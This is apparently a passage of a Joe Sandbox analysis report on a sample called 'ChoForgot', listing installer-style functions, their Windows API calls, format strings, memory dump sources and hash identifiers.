                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                        Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                        Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                        Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                        • String ID: Version
                                                                                                                                                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                        Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                        Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                        Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
